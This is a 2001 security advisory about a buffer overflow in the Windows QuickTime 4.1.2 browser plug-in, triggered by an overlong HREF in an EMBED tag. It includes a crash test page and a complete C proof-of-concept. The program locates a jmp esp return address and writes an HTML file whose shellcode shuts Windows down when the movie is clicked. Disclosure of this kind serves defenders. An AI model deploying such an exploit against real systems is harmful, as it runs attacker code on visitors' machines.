[SPSadvisory#41]Apple Quick Time Plug-in Buffer Overflow

[UNYUN <shadowpenguin () BACKSECTION NET>]

SPS Advisory #41

Apple Quick Time Plug-in Buffer Overflow

UNYUN <shadowpenguin () backsection net>
Shadow Penguin Security (http://shadowpenguin.backsection.net)

--------------------------------------------------------------

[Date]
July 31, 2001

[Vulnerable]
QuickTime Player 4.1.2 for Windows (Japanese)

[Not vulnerable]
unknown

[Overview]
   There is a exploitable buffer overflow bug in quick time plug-in
for windows. This problem occurs when the visitor clicks the shown
movie in the browser. Quick time plug-in doesn't check the length of
HREF parameter in EMBED tag appropriately, Quick time overflows when
the long string is specified in HREF. This buffer overflow overwrites
the local buffer, the codes which are written in the EMBED tag can be
executed in the client host.

[Risk]
   If the HTML file which contains the cracking code in EMBED tag is
opened and visitor clicks the shown movie, the cracking code will be
executed on the client host. This overflow contains the possibility of
 the virus and trojans infection, sytsem destruction, intrusion, and
so on.

[Details]
   We explain the details of this problem under the environment of
Windows98(SE/Japanes)+QuickTime Player 4.1.2 for Windows+Internet
Explorer 5.0. You can check this problem easily by the following
simple HTML file.

<html>
<embed src="c:\program files\quicktime\sample.mov"
       href="aaaa... long string (730 characters)"
       width=60 height=60 autoplay="true"
       target="QUICKTIMEPLAYER">
</html>

* You must prepare a sample movie file to specify in "src" parameter.
* Write 730 bytes characters in "href" parameter.

Internet Explorer will crash by the buffer overflow when the shown
movie on browser is clicked. You will be able to see that EIP is
0x61616161 in GPF dialog box when Internet Explorer is crashed.

[Avoidance]
Disable the execution of ActiveX control and plug-in.

[Caution]
   We will change this information without any notice. Use of this
information constitutes acceptance for use in an AS IS condition.
There are NO warranties with regard to this information. In no event
shall the author be liable for any damages whatever arising out of or
in connection with the use or spread of this information. Any use of
this information is only for personal experiment.

[Comments ?]
   If you have something comments, please send to following address..

UNYUN <shadowpenguin () backsection net>
http://shadowpenguin.backsection.net

[Sample code]
   This sample generates a HTML file which includes the code which
shutdowns Windows by using ExitWindowsEx API. The shutdown code is
written in EMBED tag, and executed by using this buffer overflow
problem. When you check this problem by the following sample code, you
 must set appropriate movie file in MOV_FILE (the movie file "sample.
mov" which is written in the following code is a sample which is
installed when Quick Time Player 4.1.2 is installed by default). This
sample code can be compiled by Visual C++ 6.0. This sample code was
checked under the environmentof Windows98 Second Edition (Japanese)+
Internet Explorer5.0.

/*====================================================================
   Apple QuickTime 4.1.2 plug-in exploit
   The Shadow Penguin Security (http://shadowpenguin.backsection.net)
   Written by UNYUN (shadowpenguin () backsection net)
  ====================================================================
*/

#include    <stdio.h>
#include    <stdlib.h>
#include    <windows.h>

#define MOV_FILE    "c:\\program files\\quicktime\\sample.mov"
#define HEIGHT      60
#define WIDTH       60
#define TARGET      "QUICKTIMEPLAYER"
#define FILE_IMAGE  \
                    "<html><embed src=\"%s\" href=\"%s\" "\
                    "width=%d height=%d autoplay=\"true\" "\
                    "target=\"%s\"><br></html>"
#define BUFSIZE     730
#define RET         684
#define ESP_TGT     "rpcrt4.dll"
#define JMPESP_1    0xff
#define JMPESP_2    0xe4
#define NOP         0x90

unsigned char   exploit_code[200]={
        0x33,0xC0,0x40,0x40,0x40,0x40,0x40,0x50,
        0x50,0x90,0xB8,0x2D,0x23,0xF5,0xBF,0x48,
        0xFF,0xD0,0x00,
};

main(int argc,char *argv[])
{
    FILE            *fp;
    char            buf[BUFSIZE];
    unsigned int    i,pretadr,p,ip,kp;
    MEMORY_BASIC_INFORMATION meminfo;

    if (argc<2){
        printf("usage : %s Output_HTML-fileName [Sample .mov file]\n",
               argv[0]);
        exit(1);
    }

    if ((void *)(kp=(unsigned int)LoadLibrary(ESP_TGT))==NULL){
         printf("%s is not found.\n",ESP_TGT);
         exit(1);
    }

    VirtualQuery((void *)kp,&meminfo,sizeof(MEMORY_BASIC_INFORMATION));
    pretadr=0;
    for (i=0;i<meminfo.RegionSize;i++){
        p=kp+i;
        if (  ( p     &0xff)==0
           || ((p>>8 )&0xff)==0
           || ((p>>16)&0xff)==0
           || ((p>>24)&0xff)==0) continue;
        if (   *((unsigned char *)p)==JMPESP_1
            && *(((unsigned char *)p)+1)==JMPESP_2)
            pretadr=p;
    }
    if ((fp=fopen(argv[1],"wb"))==NULL){
        printf("File write error \"%s\"\n",argv[1]);
        exit(1);
    }
    memset(buf,NOP,BUFSIZE);
    memcpy(buf+700-12,exploit_code,strlen(exploit_code));
    buf[BUFSIZE-2]=0;

    ip=pretadr;
    printf("EIP=%x\n",ip);
    buf[RET  ]=ip&0xff;
    buf[RET+1]=(ip>>8)&0xff;
    buf[RET+2]=(ip>>16)&0xff;
    buf[RET+3]=(ip>>24)&0xff;

    if (argc==2)
        fprintf(fp,FILE_IMAGE,MOV_FILE,buf,WIDTH,HEIGHT,TARGET);
    else
        fprintf(fp,FILE_IMAGE,argv[2],buf,WIDTH,HEIGHT,TARGET);
    fclose(fp);
    printf("Done.\n");
 }

-----
UNYUN
% The Shadow Penguin Security [ http://shadowpenguin.backsection.net ]
   shadowpenguin () backsection net (SPS-Official)
   unyun () shadowpenguin org (Personal)
% eEye Digital Security Team [ http://www.eEye.com ]
   unyun () eEye com